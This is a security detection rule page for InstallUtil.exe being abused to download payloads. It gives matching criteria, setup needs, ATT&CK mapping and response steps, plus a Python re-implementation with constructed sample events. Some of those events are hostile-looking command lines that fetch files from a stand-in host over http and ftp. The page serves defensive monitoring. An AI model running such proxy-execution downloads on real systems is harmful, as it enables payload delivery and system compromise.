Use of InstallUtil for Download

Rule added on 30th May, 2024

Rule type:

Correlation

Rule description:

InstallUtil.exe is a legitimate Windows utility part of the .NET framework. It is used by system administrators to install and uninstall server resources by executing specific methods within the .NET binaries.

However, it may also be used by attackers to carry out malicious activities such as downloading and executing malicious payloads.

Attack chain scenario: Phishing -> Malicious attachment -> InstallUtil-based download -> Data theft

Impact:

This activity can impact an organization in the following ways:

  • Data theft
  • Unauthorized access to resources
  • System compromise

Data source:

Windows > Process Creation

Required configuration: The rule is based on process creation and termination events. Prerequisites are installing and configuring Sysmon, enabling the process creation audit policy, and enabling command-line auditing (so that the command line is recorded in the process creation event).

Relevant MITRE ATT&CK techniques and tactics:

Tactic: TA0005 - Defense Evasion

Technique: T1218 - System Binary Proxy Execution

Sub-technique: T1218.004 - InstallUtil

Criteria:

( ( Process Name endswith installutil.exe ) OR ( ORIGINALFILENAME endswith "installutil.exe" ) ) AND ( ( Command Line contains "http" ) OR ( Command Line contains "ftp" ) )

Attackers may use installutil.exe to install and execute malicious files. The criteria match on either the process name or the ORIGINALFILENAME field so that a renamed copy of the binary is still detected, and require a remote source in the command line:

http - Used for interacting with web servers to download files.

ftp - Used for the transfer of files and data.
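The criteria above, re-implemented as an added example (not code from the rule page or its vendor) and run over constructed Sysmon-style process creation events; the field names image, original_file_name and command_line are assumptions standing in for the SIEM's "Process Name", "ORIGINALFILENAME" and "Command Line" fields, and the events are made up, not real logs.

```python
# Added example, not part of the original rule page: the rule's criteria
# re-implemented in Python and run over constructed Sysmon-style events.
# Field names (image, original_file_name, command_line) are assumptions
# standing in for the SIEM's "Process Name", "ORIGINALFILENAME" and
# "Command Line" fields; the sample events below are constructed.
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    image: str               # full path of the created process
    original_file_name: str  # OriginalFileName from the PE version resource
    command_line: str


def matches_rule(event: ProcessEvent) -> bool:
    """Return True when the event satisfies the rule's criteria.

    Comparisons are case-insensitive (an assumption; adjust if the SIEM
    compares case-sensitively). The OriginalFileName clause is what keeps
    a renamed copy of the binary inside the rule's scope.
    """
    image = event.image.lower()
    original = event.original_file_name.lower()
    cmd = event.command_line.lower()
    is_installutil = image.endswith("installutil.exe") or original.endswith("installutil.exe")
    has_remote_source = "http" in cmd or "ftp" in cmd
    return is_installutil and has_remote_source


def find_alerts(events):
    """Return the command lines of all events that trigger the rule."""
    return [e.command_line for e in events if matches_rule(e)]


# Constructed sample events covering the cases the rule is meant to separate.
SAMPLE_EVENTS = [
    # 1. Administrative use with a local assembly: no remote URI -> no alert
    ProcessEvent(r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe",
                 "InstallUtil.exe", r"InstallUtil.exe /u C:\Services\Backup.exe"),
    # 2. Direct use with an http URL in the command line -> alert
    ProcessEvent(r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe",
                 "InstallUtil.exe", r"InstallUtil.exe http://example.invalid/x.dll"),
    # 3. Renamed copy: Process Name no longer ends with installutil.exe, but
    #    OriginalFileName still does -> alert (this is why the OR clause exists)
    ProcessEvent(r"C:\Users\Public\svc.exe", "InstallUtil.exe",
                 r"svc.exe ftp://example.invalid/payload"),
    # 4. A different binary fetching over http is out of scope for this rule
    ProcessEvent(r"C:\Windows\System32\curl.exe", "curl.exe",
                 r"curl.exe http://example.invalid/update.zip"),
]

if __name__ == "__main__":
    for line in find_alerts(SAMPLE_EVENTS):
        print("ALERT:", line)
```

Event 1 shows the known false-positive shape (legitimate local assembly work) being filtered out by the http/ftp clause, while event 3 shows why the ORIGINALFILENAME clause matters.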

When to enable this rule:

Enabling this rule will help you meet the security standards' requirements listed below:

Security standards (NIST CSF 2.0):

DE.CM-09: Computing hardware and software, runtime environments, and their data are monitored to find potentially adverse events

When this rule is triggered, you're notified that the .NET InstallUtil.exe application has been used to download arbitrary files.

This enables you to monitor the use of system binaries such as InstallUtil.exe.

Known false positives: This event may be generated by administrators performing legitimate downloads to update a .NET assembly.

Next steps:

When this alert is triggered, the following measures can be implemented:

  • Identification: Identify whether the alert is a new incident or part of an existing incident.
  • Analysis: Analyze the impact and extent of the compromise to understand the severity of the attack.
  • Response: Respond promptly by initiating an automated workflow to terminate the malicious process.
  • Implement the principle of least privilege: Restrict the use of InstallUtil.exe to authorized users only.